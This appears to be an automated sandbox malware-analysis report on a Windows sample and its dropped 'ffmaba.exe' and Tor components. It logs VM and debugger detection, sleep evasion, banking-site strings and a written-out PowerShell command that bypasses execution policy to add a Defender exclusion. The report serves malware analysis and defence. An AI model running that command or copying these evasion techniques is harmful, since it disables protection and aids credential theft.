Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598938s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598813s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598703s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598469s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595985s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595860s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595735s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595610s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595485s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -594096s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604	Thread sleep time: -593969s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 1100	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 1632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6096	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 4764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 3528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1856	Thread sleep time: -9223372036854770s >= -30000s

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599782
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598703
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 594096
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 593969
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemut-cq
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware`,cq
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tor-real.exe, 00000019.00000002.4506475775.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2580669352.0000000003B85000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4hQpFIf62HGFSgFPpC9pEuCY6ucujJf6Ftb2YTL+QvzBv4j65ro8p+uPnTzWQTQb
Source: yt7dW9nyJK.exe, 00000000.00000002.2067271416.0000000000640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: tor-real.exe, 00000019.00000003.2603770446.0000000003B67000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
Source: yt7dW9nyJK.exe, 00000004.00000002.4503685491.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4567101003.0000000008BA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: veew:vmware
Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: dsMWdeSqEmuJJIBpLr
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tor-real.exe, 00000019.00000003.2513085213.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IZLX8lNvJiqIXS9BPkTdcJG0LMdDTHgfSJsXP51YJFT3GhWGMmVcI3q8+JfiRaM+
Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: olC9lOqWPHK88HFMTEhwNWbT7gvrCu9S6t7YKiU0tCTrnSyoqh98BYJMKYPcVyVq6QH7wK0MITIdm5LCOdc8NQiQgosgZCikoR0VE9b14hr9AdPDqvax914xQbRvHHUserControlSystem.Windows.FormsChRU3suQZG888ENdRHUITypeEditorSystem.Drawing.DesignSystem.DrawinghJoBVTCJOFB8KbEMJfEnumqtabICjUM1yu2dXfPRE2SGhQYFowq1a4bCowl34GXL5vNW82bgMJ5lzBNpsa1J6aFfpJ9agJMulticastDelegateS38nbElj16DUH4JmgowrOlfvWiRFUqlEadjbuJQbHFNDeqVG9J5p7Jmc5DtE4OAi1XadTaq6GKDwRgE783WxvWp6FfIdB8fkUaD5p3FJwdr3aZIq4n2jNC2gHBRbtvuBlyJUPig7ystNtlItEHTD4YcGU3B3X7aUWPkHxckGKt1a6kPhq2xyog03IpvEUnRkmsThhpEnmb0GDRg1JwvqHtkcPZKoYg6xYJvGADoYIbA72EcoBeHj6l5IrCVuXw0UjhJAXcjuqEfet4MwQVESrnfkCGOjDZTXfDQQcMfUTS02PsiElBFN1VQYyPPFDDqqNNDPtg4MpPgqZnG1LR7LKxEI838eQgK6UTnMQjfwuU2UPPwPJLQsRsHPypoXGlh9FSyLkQpmpfLuvQhmVZmG0JZtewW47VKoO1A80rKYoteG0JemVRyoiielLoCsXvUvwVY22DMKX09nMNQYPNewbTihrPRL4pCKUA63i3fDdWaVOOc8904gwBAbM77CvDHNk3Wt4nnsOAh82OGR39MMrSWBIeuAxKq2AjIGjbHLJ2ABcydsMWdeSqEmuJJIBpLrnhYoc49lXKnNh5aiCvwhBZyOnDtx0yAShZ25EventArgsKfMYoKipy60SihV2CuApplicationExceptionLjKFJcGnQbFpADmDEjwShyhrkNG0qWJND3SvfKuFCZdsOPruwLDaUCG3L0NIMHLFjsoLjt29NbgqbDZfxTd3FhSpvTFfQAINhFBC6dNiNZwgFY2mwLsU9abgqviB9BUjMKYsbxiOGkaFTe6VnKKY7Tt52faTCddFBgnlGFpdxwrdyqFjguXlRandomzdH4f3pZmi7p2yCYxrFNiqGIzN6YouuO6eE2ExpandableObjectConverterSystem.ComponentModelMoLs8m78ESt4YD6gORWbY96JQ77r098fZP3507seoCK27qJBYxrPOCBskwqc7bO7TnM3ZX08JehS<Module>{C4C74D2E-796D-4738-A2CB-2385446279D3}z8kGPD7V8d7hxfofvLDR8Ws5h7LgtEIaV5HSC1lhfqZ77uv0qpfoRgUYT<PrivateImplementationDetails>{562DFE12-60DD-4FBB-98FE-0EEC878F2D71}__StaticArrayInitTypeSize=256__StaticArrayInitTypeSize=40__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=32__StaticArrayInitTypeSize=16__StaticArrayInitTypeSize=64__StaticArrayInitTypeSize=18
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tor-real.exe, 00000019.00000002.4504777802.000000000105E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: ffmaba.exe, 0000000B.00000002.2262375658.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2255035504.0000000002590000.00000004.08000000.00040000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2262375658.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2332127774.0000000003BB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemu'T
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: nde7wqEmuJ
Source: tor-real.exe, 00000019.00000002.4508537239.00000000059E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4Z7HsFL3Y/X5CqfwtTJvNNbhGfSyZTok9JiO/lGEurgMLddZED/0WVWtcZ/YAH7k
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Anti Debugging

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Code function: 4_2_02A91DF4 CheckRemoteDebuggerPresent,

4_2_02A91DF4

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Process queried: DebugPort

Enables debug privileges

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Memory allocated: page read and write | page guard

Adds a directory exclusion to Windows Defender

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'

Creates a process in suspended mode (likely to inject code)

